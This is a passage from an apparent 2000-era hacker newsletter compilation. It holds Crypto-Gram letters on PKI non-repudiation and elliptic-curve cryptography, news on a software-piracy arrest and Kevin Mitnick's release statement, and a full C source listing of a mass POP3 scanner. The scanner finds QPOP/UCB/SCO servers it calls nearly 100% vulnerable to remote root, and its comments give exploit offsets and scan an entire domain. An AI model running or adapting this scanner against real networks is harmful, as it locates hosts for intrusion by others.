The law seems to say that at first reading, but my view of the law is that it sets up a "rebuttable presumption" of non-repudiation. This is the same rule that applies to physical, pen and ink signatures. Your statement reflects the views of some proponents of PKI who overstate the legal force of a "licensed digital signature" under Washington law. But if, in fact, I never applied my digital signature to a document, and I can prove it (e.g., I have an alibi), then I would not be legally responsible. I believe that is the situation in non-PKI electronic signature schemes, where a (paper and manually signed) Electronic Data Interchange Agreement or Trading Partner Agreement will state that all data submitted between the parties carries the same legal force as if it was manually signed.

Having found flaws in the PKI-style laws of Washington, Utah and Minnesota, I do not find a great deal of higher or practical intelligence in the more popular electronic signature laws, either. Esignature laws have not proven any more important to ecommerce than PKI digital signature laws, so why are we in such a rush to pass UETA (uniform electronic transaction act)?

From: "Carl Ellison"
Subject: Re: PKI article--agree and disagree

You are correct. However, I believe we still need to warn against the rebuttable presumption of non-repudiation. The keyholder may have no alibi at all. The keyholder may not be aware that his key was misused (e.g., by an attacker who had gained physical or network access to his computer).
This is similar to the position people were in in Britain when they were challenging ATM card operations. It took expert witnessing by Ross Anderson to defend some of their claims, and even then it didn't always work. There, too, the presumption was that the cardholder performed any operation when the ATM logs said he did -- whether he did or not. It was up to the cardholder to prove the negative.

This gets even worse when the keyholder has his private key on a smartcard in his possession. It's that much harder to convince a jury that you didn't sign, if the merchant or bank can claim that the signing key never left your personal possession.

When an attacker has network access to your computer, he doesn't leave a trail. You have no audit record showing the attack. It's your word against the merchant's and you have no evidence to offer on your behalf. You can't even accuse anyone else. You have no idea who to accuse. Meanwhile, your account has been debited until you manage to prove your point (against the presumption that you're lying).

When you compare this to credit card purchases, it's radically different. With a credit card, you have not spent anything until you write the check to the credit card company. When or before you write that check, you can challenge a line item and force the merchant to prove that you were in fact the purchaser. At least with my AMEX account, the immediate result is that AMEX removes the item from my statement -- to be reinstated if the merchant is able to prove that I did do the purchase. I have had such challenges go my way once and the other times, I had simply forgotten. In one case, I thought I was being double-billed, but it turns out I had never been billed the first time (many months before).

From: Alfred John Menezes
Subject: Elliptic Curve Cryptosystems

I read with interest your recent article on ECC in the November 15 issue of Crypto-Gram. I agree with most of your statements and comments.
Your recommendations were:

1) If you're working in a constrained environment where longer keys just won't fit, consider elliptic curves.
2) If the choice is elliptic curves or no public-key algorithms at all, use elliptic curves.
3) If you don't have performance constraints, use RSA.
4) If you are concerned about security over the decades (and almost no systems are), use RSA.

I certainly agree with recommendations 1) and 2) -- ECC certainly cannot be worse than no security at all!

Regarding recommendation 3), I think that most environments which call for public-key solutions will have *some* performance constraints. The limiting factor could be an over-burdened web server which needs to sign thousands of outgoing messages per minute, a handheld device which is communicating with a PC, etc. In such scenarios, one should select the public-key method that performs the best in the most constrained environment. If the constraints involve key sizes, bandwidth, power consumption, or speed (for private key operations), then ECC is likely the method of choice over RSA.

Finally, I feel that your recommendation that RSA should be used (instead of ECC) in situations where you are concerned with long-term security is a bit unfair. After all, as you state in the postscript to your article, all the analysis you used on the elliptic curve discrete logarithm problem also applies to the integer factorization problem. I propose that applications which do require long-term security should consider using *both* RSA and ECC -- by double encrypting a message with RSA and ECC, or by signing a message twice with RSA and ECC.

The following are my condensed thoughts on the security and efficiencies of ECC as compared with RSA. They should be considered a supplement to your Crypto-Gram article, and not a replacement of it.
http://www.cacr.math.uwaterloo.ca/~ajmeneze/misc/cryptogram-article.html

((This is a good essay, but remember the author's bias.
He works for Certicom, and it is in his financial interest for you to believe in elliptic curves. --Bruce))

** *** ***** ******* *********** *************

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of Counterpane Internet Security Inc., the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on computer security and cryptography.

Counterpane Internet Security, Inc. is a venture-funded company bringing innovative managed security solutions to the enterprise. http://www.counterpane.com/

Copyright (c) 2000 by Bruce Schneier

ISN is sponsored by Security-Focus.COM

@HWA

20.0 POPS.C qpop vulnerability scanner by Duro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* POPScan QPOP/UCB/SCO scanner by duro duro@dorx.net
   takes list of ip's from stdin

   The hosts gathered by this scanner are almost 100% vulnerable to a
   remote root attack. The exploits used to root the vulnerable machines
   can all be found by searching bugtraq. UCB pop is 100% of the time
   vulnerable to the qpop exploit (it's a very old version of qpop). The
   QPOP version is filtered to make sure that non-vulnerable versions do
   not show up in the scan.

   Common offsets for the bsd qpop exploit are:
   621, 1500, 500, 300, 900, 0

   Example usage:
   ./z0ne -o ac.uk | ./pops > ac.uk.log &
   would scan ac.uk for vulnerabilities.

   much help from jsbach */

/* The header names were stripped from the original listing; these are
   the standard headers the calls below need. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int ADMtelnet(u_long ip, int port);
void scan(char *ip);
void checkos(char *ip, int spl);

char domain[50];
int NUMCHILDREN = 150, currchilds = 0;   /* change numchildren to taste */
char ip[16];
char *temp1 = NULL;                       /* points at the trailing newline of an ip */

/* SIGALRM handler: its only job is to interrupt a hanging connect() */
void alrm(int sig)
{
    (void)sig;
    return;
}

int main(void)
{
    /* one child per address read from stdin, at most NUMCHILDREN in flight */
    while ((fgets(ip, sizeof(ip), stdin)) != NULL)
        switch (fork()) {
        case 0:
            scan(ip);
            exit(0);
        case -1:
            printf("cannot fork so many timez@!@^&\n");
            exit(0);
            break;
        default:
            currchilds++;
            if (currchilds > NUMCHILDREN)
                wait(NULL);
            break;
        }
    return 0;
}

/* connect to port 110, read the banner and classify the POP daemon */
void scan(char *ip)
{
    char printip[16];
    struct sockaddr_in addr;
    int sockfd;
    char buf[512];

    bzero((struct sockaddr_in *)&addr, sizeof(addr));
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr(ip);
    addr.sin_port = htons(110);
    addr.sin_family = AF_INET;
    signal(SIGALRM, alrm);
    alarm(5);
    if ((connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1)) {
        memset(buf, 0, sizeof(buf));              /* keep the banner NUL-terminated for strstr */
        recv(sockfd, (char *)buf, sizeof(buf) - 1, 0);
        if ((strstr(buf, "QPOP")) != NULL && (strstr(buf, "2.5")) == NULL
            && (strstr(buf, "krb")) == NULL) {
            checkos(ip, 1);
        }
        if ((strstr(buf, "UCB")) != NULL)
            checkos(ip, 2);
        if ((strstr(buf, "SCO")) != NULL) {
            strcpy(printip, ip);
            if ((temp1 = strrchr(printip, '\n')) != NULL)
                bzero(temp1, 1);
            printf("%s: SCO Unix box running SCO pop.\n", printip);
        }
    }
    return;
}

/* spl: 1 = QPOP banner seen, 2 = UCB pop banner seen */
void checkos(char *ip, int spl)
{
    int temp2;
    char printip[16];
    unsigned long temp;

    temp = inet_addr(ip);
    temp2 = ADMtelnet(temp, 23);
    strcpy(printip, ip);
    if ((temp1 = strrchr(printip, '\n')) != NULL)
        bzero(temp1, 1);
    if ((temp2 == 1) && (spl == 1))
        printf("%s: OpenBSD box running vuln QPOP\n", printip);
    if ((temp2 == 1) && (spl == 2))
        printf("%s: OpenBSD box running vuln UCB pop\n", printip);
    if ((temp2 == 2) && (spl == 1))
        printf("%s: FreeBSD box running vuln QPOP\n", printip);
    if ((temp2 == 2) && (spl == 2))
        printf("%s: FreeBSD box running vuln UCB pop\n", printip);
    if ((temp2 == 3) && (spl == 1))
        printf("%s: BSDi box running vuln QPOP\n", printip);
    if ((temp2 == 3) && (spl == 2))
        printf("%s: BSDi box running vuln UCB pop\n", printip);
}

/* talk to the telnet port, decline option negotiation, and grep the
   login banner for the OS name: 1 = OpenBSD, 2 = FreeBSD, 3 = BSDI */
int ADMtelnet(u_long ip, int port)
{
    struct sockaddr_in sin;
    u_char buf[4000];
    int dasock, len;
    int longueur = sizeof(struct sockaddr_in);

    dasock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);   /* gimme a socket */
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = ip;
    if (connect(dasock, (struct sockaddr *)&sin, longueur) == -1)
        return (-1);
    while (1) {
        memset(buf, 0, sizeof(buf));
        if ((len = read(dasock, buf, 1)) <= 0)
            break;
        if (*buf == (unsigned int)255) {           /* IAC: answer DO with WONT */
            read(dasock, (buf + 1), 2);
            if (*(buf + 1) == (unsigned int)253 && !(u_char) * (buf + 2))
                ;
            else if ((u_char) * (buf + 1) == (unsigned int)253) {
                *(buf + 1) = 252;
                write(dasock, buf, 3);
            }
        } else {
            if (*buf != 0) {
                bzero(buf, sizeof(buf));
                read(dasock, buf, sizeof(buf) - 1);
                usleep(40000);
                if ((strstr((char *)buf, "OpenBSD") != NULL))
                    return 1;
                if ((strstr((char *)buf, "FreeBSD") != NULL))
                    return 2;
                if ((strstr((char *)buf, "BSDI") != NULL))
                    return 3;
                sleep(1);
            }
        }
    }
    return 0;
}

@HWA

21.0 Hackunlimited special birthday free-cdrom offer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by noose

http://www.hackunlimited.com/

Would you want to have all the files in Hackunlimited.com on CD, for free of course? Just send mail to noose@hackunlimited.com. The message itself can be empty, just put the Subject to "Free CD" and you are part of our "lottery" :). You have time until 13th of February to send the message. 3 people will win the CD. The winners will be announced on the 22nd of February.

The CD will include all files at http://www.hackunlimited.com + all the files in http://www.hackunlimited.com/raz0r

The file list is available here:
http://www.hackunlimited.com/cdlist.txt

@HWA

22.0 HACK MY SYSTEM! I DARE YA!
~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.securiteam.com/securitynews/_Can_you_break_into_my_system__I_dare_you__.html

Title
"Can you break into my system? I dare you!"

Summary
We in Beyond Security believe that the only way to test your security is by trying to break it. But we're not as drastic as one Linux system administrator who took this one step further - he is asking attackers to try and break into a server he is administrating.

Details
Many administrators have to deal with potentially malicious users having legal accounts on their servers. Universities, ISPs and large companies have to consider the risk that local users, having access to the system as valid users, will sometime try to elevate their privileges.

The system administrator of zeus-olympus.yi.org assumes that some of his users are 'evil'. Although he is confident that his Linux system is secured, he would like others to do their best to attack his system. He therefore provided two user accounts that have normal user access to the system, and he allows anyone who wishes to use those accounts and gain entry to the server. Once logged in, the users are free to try and compromise the system's security, with no strings attached. The only 'catch' is that once a vulnerability is found, it should be reported immediately, so that the hole can be closed.

This offer is extremely unique. There have been 'hacking' contests in the past (usually by commercial companies trying to show that their product is secure), but this is one of the first times that an administrator is offering full access to the machine (using a valid user account) - which of course makes this game much more interesting. Therefore, if you would like to try and break a Linux Redhat machine, join this war game and give it your best shot.

Additional information
To join the contest, visit http://zeus-olympus.yi.org/ and enter the 'password required' section. The login is: war and the password is game.
Upon entering this section, you will receive the account information needed to log into the server.

Feel free to give Danny some feedback about his war game: dannyw@mediaone.net.

@HWA

23.0 PWA lead member busted by the FBI
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by TRDonJuan

http://www.suntimes.com/output/news/ware04.html

Software pirating ring cracked by local FBI

February 4, 2000

BY LORRAINE FORTE STAFF REPORTER

Chicago FBI agents say they have broken up a worldwide ring of software thieves--called the "Pirates with Attitude"--who were distributing thousands of programs, including the yet-unreleased Windows 2000.

A tip from an informant in Chicago led to the breakup of "one of the most sophisticated and longest-standing" piracy and hacking rings, according to a complaint filed Thursday in federal court in Chicago. The FBI used the informant's access codes to break into the group's Web site and obtain a roster of the suspects.

Robin Rothberg was arrested Thursday at his home in New Chelmsford, Mass., near Boston. Federal officials say he was a founder and key member of the ring, which evaded law enforcement for eight years. He is charged with conspiring to infringe copyright.

Three days before Christmas, Rothberg somehow got a copy of Windows 2000--the latest update of the operating system, scheduled to go on sale next month--and uploaded it to the Internet, according to the criminal complaint.

Rothberg, an employee of NEC Technologies, accessed the group's Internet site through a Zenith Data Systems computer server in Buffalo Grove, the complaint states. At least two other users allegedly pirated and distributed software through servers in Chicago, at MegsInet Inc. on West Ohio and at Computer Engineers Inc. on North Wacker.

Members of the group downloaded software in exchange for uploading other programs, said Assistant U.S. Attorney Lisa Griffin. They might then give away or sell that software.

"It was a barter system, with the upshot being that the site itself contained an incredible amount of software," Griffin said.

FBI spokesman Ross Rice said the investigation is continuing. Authorities do not yet know the size of the pirating ring, or the monetary value of the thousands of stolen software titles allegedly distributed from the group's WAREZ site, called Sentinel. WAREZ is a term for an Internet site that distributes pirated versions of software.

The Sentinel site was launched in April 1996 and was set up so that only authorized users could access it; it was not available to the general public.

The group's members were "carefully screened to minimize the risk of detection" and were given specific roles, such as "crackers," who stripped away the copy protection often embedded in commercial software; "couriers," who transferred large volumes of software files from other pirating sites, and "suppliers," who brought in programs from major software companies.

Rothberg, according to the complaint, stole at least nine other major Microsoft programs between June and October 1999. Microsoft did not respond Thursday to requests to comment on the case.

An industry group, the Business Software Alliance, has said software theft costs 33,000 jobs and $11 billion a year.

-=-

http://www.bostonherald.com/bostonherald/lonw/comp02042000.htm

FBI nabs Chelmsford man in software piracy ring

by Andrea Estes

Friday, February 4, 2000

Federal officials say they've captured a leader of a worldwide band of e-pirates who surf the cyberseas in search of software plunder.

Robin Rothberg, 32, of Chelmsford, is a founding member of Pirates with Attitudes, an international crew that steals popular titles from powerful companies and gives them away to its members for free, the FBI says.

The group, snared by FBI agents in Chicago, is sophisticated and devious enough to have sought after software before it hits the shelves, authorities said.

In December, FBI agents found Windows 2000 - which still hasn't been released - and Office 2000 premium, a program given to select customers for testing purposes. In all, agents found enough software to fill the memory of 1,200 average-sized personal computer hard drives.

Rothberg, who until last week was a notebook software engineer for NEC Computer Services in Acton, was arrested yesterday and charged with conspiracy in U.S. District Court in Boston. Wearing a long ponytail and black leather jacket, he pleaded not guilty and was released without bail.

According to an FBI affidavit, Pirates with Attitudes is a highly structured organization with different members assigned different tasks. ``Suppliers'' steal the programs from major software companies. ``Couriers'' deliver the files to PWA and ``crackers'' strip away the security codes that prevent piracy.

The group, overseen by a council, screens members to ``minimize the risk of detection by authorities,'' according to an affidavit filed by FBI Special Agent Michael Snyder of Chicago.

Rothberg, who is alleged to be a member of the council, was arrested after an informant helped steer Snyder, an MBA and computer expert, through its maze-like system. Agents located PWA's internet site, ``Sentinel,'' which is accessible only to authorized users.

``Members maintain access to PWA's site by providing files, including copyrighted software files obtained from other sources, and in turn are permitted to copy files provided by other users,'' wrote Snyder.

``Using the confidential informant's access codes, FBI agents logged onto Sentinel and viewed a directory listing thousands of copyrighted software titles available for downloading by PWA members,'' he wrote.

So far only Rothberg has been arrested. Chicago authorities yesterday said the investigation is continuing.

``In the simplest terms, it's an organization that allowed its members to upload software to a site configured so it could store a substantial amount of software,'' said assistant United States Attorney Lisa Griffin. ``They could then download it into their own computers.''

Members give and take what they wish, officials said.

``It's a two-way street,'' said Randy Sanborn, spokesman for the United States Attorney's Office in the Northern District of Illinois.

Officials wouldn't say whether members have to pay anything - such as a membership fee - for the service.

Rothberg was downsized out of his job last week when the division he worked for ceased to exist, according to an NEC spokeswoman, who said the company has no plans to investigate Rothberg's job performance.

Rothberg asked Magistrate Judge Robert Collings for permission to travel to California today for a job interview. And Rothberg said he had several more planned, his attorney Joseph Savage told Collings.

Collings ordered him to stay off his computer except to look for a job, let the FBI spot check his e-mail, and get the court's permission if he wants to travel outside the Bay State.

@HWA

24.0 Mitnick's Release Statement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I debated whether or not to include this in this issue since the news is saturated with Mitnick stories right now (at least they're taking notice) and decided it was valid to include it here in our archives. There are many more articles available on Mitnick, so I've just included his release statement. Check out the sites http://www.freekevin.com/ or http://www.2600.com/ for more info.

Mitnick's Release Statement:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

January 21, 2000

Kevin Mitnick read the statement shown below upon his release from federal custody in Lompoc, California after nearly 5 years behind bars. Mr. Mitnick is the copyright holder of this statement, and hereby gives permission for limited reuse and republication under the Fair Use doctrine of U.S. Copyright Law.
All other rights reserved.

Good morning. Thank you all for taking the time to come out to Lompoc today, my first day of freedom in nearly five years. I have a brief statement to read, and I ask that you permit me to read my statement without interruption.

First, I'd like to thank the millions of people who have visited the website kevinmitnick.com during my incarceration, and who took the time to show their support for me during the past five years. I relied on their support during the five years I've been incarcerated more than they will ever realize, and I want to thank them all from the bottom of my heart.

As many of you know, I've maintained virtually complete silence during my incarceration -- I've refused dozens of requests for interviews from news organizations from around the world, and for very real reasons -- my actions and my life have been manipulated and grossly misrepresented by the media since I was 17, when the Los Angeles Times first violated the custom, if not the law, that prohibits publication of the names of juveniles accused of crimes.

The issues involved in my case are far from over, and will continue to affect everyone in this society as the power of the media to define the "villain of the month" continues to increase. You see, my case is about the power of the media to define the playing field, as well as the tilt of that playing field -- it's about the power of the media to define the boundaries of "acceptable discussion" on any particular issue or story.

My case is about the extraordinary breach of journalistic ethics as demonstrated by one man, John Markoff, who is a reporter for one of the most powerful media organizations in the world, the New York Times.

My case is about the extraordinary actions of Assistant U.S. Attorneys David Schindler and Christopher Painter to obstruct my ability to defend myself at every turn.

And, most importantly, my case is about the extraordinary favoritism and deference shown by the federal courts toward federal prosecutors who were determined to win at any cost, and who went as far as holding me in solitary confinement to coerce me into waiving my fundamental Constitutional rights. If we can't depend on the courts to hold prosecutors in check, then whom can we depend on?

I've never met Mr. Markoff, and yet Mr. Markoff has literally become a millionaire by virtue of his libelous and defamatory reporting -- and I use the word "reporting" in quotes -- Mr. Markoff has become a millionaire by virtue of his libelous and defamatory reporting about me in the New York Times and in his 1991 book "Cyberpunk."

On July 4th, 1994, an article written by Mr. Markoff was published on the front page of the New York Times, above the fold. Included in that article were as many as 60 -- sixty! -- unsourced allegations about me that were stated as fact, and that even a minimal process of fact-checking would have revealed as being untrue or unproven.

In that single libelous and defamatory article, Mr. Markoff labeled me, without justification, reason, or supporting evidence, as "cyberspace's most wanted," and as "one of the nation's most wanted computer criminals." In that defamatory article, Mr. Markoff falsely claimed that I had wiretapped the FBI -- I hadn't -- that I had broken into the computers at NORAD -- which aren't even connected to any network on the outside -- and that I was a computer "vandal," despite the fact that I never damaged any computer I've ever accessed. Mr. Markoff even claimed that I was the "inspiration" for the movie "War Games," when a simple call to the screenwriter of that movie would have revealed that he had never heard of me when he wrote his script.

In yet another breach of journalistic ethics, Mr. Markoff failed to disclose in that article -- and in all of his following articles about me -- that we had a pre-existing relationship, by virtue of Mr. Markoff's authorship of the book "Cyberpunk." Mr. Markoff also failed to disclose in any of his articles about this case his pre-existing relationship with Tsutomu Shimomura, by virtue of his personal friendship with Mr. Shimomura for years prior to the July 4, 1994 article Mr. Markoff wrote about me.

Last but certainly not least, Mr. Markoff and Mr. Shimomura both participated as de facto government agents in my arrest, in violation of both federal law and journalistic ethics. They were both present when three blank warrants were used in an illegal search of my residence and my arrest, and yet neither of them spoke out against the illegal search and illegal arrest.

Despite Mr. Markoff's outrageous and libelous descriptions of me, my crimes were simple crimes of trespass. I've acknowledged since my arrest in February 1995 that the actions I took were illegal, and that I committed invasions of privacy -- I even offered to plead guilty to my crimes soon after my arrest. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence.

My case is a case of curiosity -- I wanted to know as much as I could find out about how phone networks worked, and the "ins" and "outs" of computer security. There is NO evidence in this case whatsoever, and certainly no intent on my part at any time, to defraud anyone of anything.

Despite the absence of any intent or evidence of any scheme to defraud, prosecutors Schindler and Painter refused to seek a reasonable plea agreement -- indeed, their first "offer" to me included the requirement that I stipulate to a fraud of $80 million dollars, and that I agree never to disclose or reveal the names of the companies involved in the case.

Have you ever heard of a fraud case where the prosecutors attempted to cover up the existence of the fraud? I haven't. But that was their method throughout this case -- to manipulate the amount of the loss in this case, to exaggerate the alleged harm, to cover up information about the companies involved, and to solicit the companies involved in this case to provide falsified "damages" consistent with the false reputation created by Mr. Markoff's libelous and defamatory articles about me in the New York Times.

Prosecutors David Schindler and Christopher Painter manipulated every aspect of this case, from my personal reputation to the ability of my defense attorney to file motions on time, and even to the extent of filing a 1700 item exhibit list immediately before trial. It was the prosecutors' intent in this case to obstruct justice at every turn, to use the unlimited resources of the government and the media to crush a defendant who literally had no assets with which to mount a defense.

The fact of the matter is that I never deprived the companies involved in this case of anything. I never committed fraud against these companies. And there is not a single piece of evidence suggesting that I did so. If there was any evidence of fraud, do you really think the prosecutors in this case would have offered me a plea bargain? Of course not.

But prosecutors Schindler and Painter would never have been able to violate my Constitutional rights without the cooperation of the United States federal court system. As far as we know, I am the only defendant in United States' history to ever be denied a bail hearing. Recently, Mr. Painter claimed that such a hearing would have been "moot," because, in his opinion, the judge in this case would not have granted bail. Does that mean that the judge in this case was biased against me, and had her mind made up before hearing relevant testimony? Or does that mean that Mr. Painter believes it is his right to determine which Constitutional rights defendants will be permitted to have, and which rights they will be denied?

The judge in this case consistently refused to hold the prosecutors to any sort of prosecutorial standard whatsoever, and routinely refused to order the prosecutors to provide copies of the evidence against me for nearly four years. For those of you who are new to this case, I was held in pre-trial detention, without a bail hearing and without bail, for four years. During those four years, I was never permitted to see the evidence against me, because the prosecutors obstructed our efforts to obtain discovery, and the judge in this case refused to order them to produce the evidence against me for that entire time. I was repeatedly coerced into waiving my right to a speedy trial because my attorney could not prepare for trial without being able to review the evidence against me.

Please forgive me for taking up so much of your time. The issues in this case are far more important than me, they are far more important than an unethical reporter for the New York Times, they're far more important than the unethical prosecutors in this case, and they are more important than the judge who refused to guarantee my Constitutional rights. The issues in this case concern our Constitutional rights, the right of each and every one of us to be protected from an assault by the media, and to be protected from prosecutors who believe in winning at any cost, including the cost of violating a defendant's fundamental Constitutional rights. What was done to me can be done to each and every one of you.

In closing, let me remind you that the United States imprisons more people than any other country on earth.

Again, thank you for taking time out of your busy lives to come to Lompoc this morning, and thank you all for your interest and your support.
@HWA

24.1 More submitted Mitnick articles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributions by Zym0t1c

Hacker Mitnick released Friday

For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again? Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning...

Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future.

Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425165,00.html

Read the (fine but short) Dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4462

Since this is *big* news, you can stay here and read the ASCII-version:

Hacker Mitnick released Friday

By Kevin Poulsen, ZDNet News
UPDATED January 21, 2000 9:30 AM PT

For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again? Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning...

Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future.

The 36-year-old hacker was greeted at the gate by friends and family members. His mother will drive him to Los Angeles, where his first order of business will be to obtain a driver's license, report to his new probation officer and see a doctor about injuries he suffered in a prison bus accident last year.

"He's having neck pains, and back and shoulder pains," said Reba Vartanian, Mitnick's grandmother. "He hasn't had a regular doctor in five years."

A free man for the first time since 1995, he will live in the Los Angeles suburb of Westlake Village with his father, Alan Mitnick, a general contractor.

Less clear is what Mitnick is going to do for a living. Under court order, the hacker is banned for three years from using any kind of computer equipment without the prior written permission of his probation officer -- a restriction that even the court acknowledged would affect his employability.

"He's experiencing a lot of frustration over the things he can't do," said Eric Corley, editor of the hacker magazine 2600 and the leader of a "Free Kevin" grass-roots movement. "Keep in mind this is someone who's been kept away from these things for five years, and when he gets out he won't even be able to touch them."

Does incarceration cure an addict?

The restrictions, and long history of recidivism, make one former friend and partner-in-crime pessimistic about Mitnick's future.

"Do you cure a drug addict or alcoholic by incarceration on its own?" asked Lew DePayne, rhetorically. "Do you cure him by taking away his ability to earn a living?"

Mitnick and DePayne became friends in the late 1970s, when they were both teenagers. Together, they explored and manipulated the telephone network as Los Angeles' most notorious "phone phreaks." In the 1980s, DePayne seemingly dropped out of the scene, while Mitnick moved on to corporate computers and networks, developing a penchant for cracking systems in search of proprietary "source code," the virtual blueprints for a computer program or operating system.

Mitnick had already been in a series of minor skirmishes with the law when, in 1989, he suffered his first adult felony conviction for cracking computers at Digital Equipment Corp. and downloading source code. He served one year in federal custody, followed by three years of supervised release. In 1992, Mitnick was charged with a violation of his supervision for associating with DePayne again.
He went underground and online, using the Internet to crack computers belonging to such cell phone and computer makers as Motorola (NYSE: MOT), Fujitsu and Sun Microsystems (Nasdaq: SUNW) and to copy more proprietary source code.

The FBI captured him on Feb. 15, 1995, when computer security expert Tsutomu Shimomura suffered an attack on his machine and responded by tracking Mitnick to his hideout in Raleigh, N.C. Shimomura and New York Times reporter John Markoff went on to write the book "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It."

Shimomura and Markoff sold the movie rights to Miramax Films, who cast Skeet Ulrich as Mitnick. But since shooting wrapped on the project in December 1998 the movie has languished on the shelf with no known theatrical release date, surrounded by swirling rumors of a direct-to-video or cable TV release. Miramax publicists didn't return telephone inquiries about the project.

Mitnick's arrest began a series of courtroom battles over procedures and evidence that finally ended last year in a plea agreement. The hacker pleaded guilty in March 1999 to seven felonies and admitted to his Internet hacking. In August 1999, Judge Marianna Pfaelzer sentenced him to 46 months in prison, on top of an earlier 22 months sentence for the supervision violation and cell phone cloning. With credit for his lengthy period of pretrial custody, and some time off for good behavior, Mitnick's served just under five years in prison.

"My sincere hope is that he gets his act together and complies with the conditions of his supervised release and doesn't engage in further hacking activity," said Assistant U.S. Attorney Christopher Painter, one of Mitnick's two federal prosecutors. Painter's work on the Mitnick case helped propel him to a position as deputy chief of the U.S. Department of Justice's computer crime and intellectual property section in Washington, D.C. He begins at the DOJ in March.

"I think that the significance of this case is that he was so prolific. He not only had done this once before, but he did it on such a large scale," Painter said. "If past ends up being prologue, then certainly we'll go back to court and deal with it at that time."

From hacking to ham?

Greg Vinson, one of Mitnick's defense attorneys, foresees a rosier future for the hacker, perhaps with a job that exploits his famous ability to "social engineer" people into doing his bidding.

"I think he's had a number of different offers to kind of do PR-type of work," said Vinson, who also points out that Mitnick might still get a computer job. "You have to remember the order says, 'Without the prior express permission of the probation office.' So it's not absolutely prohibited."

If Mitnick can't use computers, he reportedly hopes to indulge his love for technology by returning to amateur radio, a childhood passion. Federal Communications Commission records show that Mitnick's license expired last month. According to Kimberly Tracey, a ham radio operator in Los Angeles and a friend of Mitnick's, he's been scrambling to renew it.

"This is going to be part of Kevin's life, because they've taken away computers and everything else," said Tracey. "I hope they don't take away this."

Mitnick was unavailable for comment on his imminent release. Sources close to the hacker say he granted the CBS news show "60 Minutes" an exclusive interview last week, which is scheduled to air Sunday. But in an interview with ZDNet News last July, Mitnick complained about his treatment by the government prosecutors, who he said were "grossly exaggerating the losses in the case and the damages I caused." (See: Mitnick says, "I was never a malicious person.")

DePayne: Anger a major stumbling block

DePayne, Mitnick's former friend and co-defendant, worries that Mitnick's anger will work against him in his new life.

"I don't know if that's ever going to go away; I don't know if he'll be able to deal with it," said DePayne, speaking from his home in Palo Alto, Calif., where he's serving six months house arrest for aiding Mitnick's hacking during his fugitive years. "That's going to be a major stumbling block for him going forward."

DePayne said he last heard from Mitnick the night of his arrest, on a message left on his answering machine. Now 39 years old, divorced and heading a small Internet company of his own, DePayne insists he doesn't plan on associating with the impish hacker he first met as a brash teenager two decades ago.

"I can't be fooling around with these stunts and practical jokes that Kevin might want to fool around with," said DePayne. "I'll miss Kevin. I won't miss the trouble he brings to the table."

Kevin Poulsen is a former hacker. He writes a weekly column for ZDTV's CyberCrime.

____________________________________________________________________________

Mitnick: I was manipulated

That's how hacker Kevin Mitnick feels after almost five years behind bars. Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years.

Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425686,00.html?chkpt=zdnntop

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick: I was manipulated

By Robert Lemos, ZDNet News
UPDATED January 21, 2000 3:41 PM PT

Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years.

"Prosecutors ... manipulated every aspect of this case from my personal reputation, to the ability of my defense attorney to file motions in time, and even to the extent of filing a 1,700-item exhibit list immediately before a trial," said Mitnick, reading from a three-page statement to reporters gathered near the Lompoc, Calif. prison facility, minutes after being released from the medium-security prison.

Almost five years ago, federal authorities arrested Mitnick on a 25-count indictment relating to misuse of Pacific Bell equipment for illegal wiretaps and copying proprietary source code from Motorola, Sun Microsystems Inc., NEC Corp. and Novell, among others.

"My case is one of curiosity," said Mitnick. "There was no intent to defraud anyone of anything."

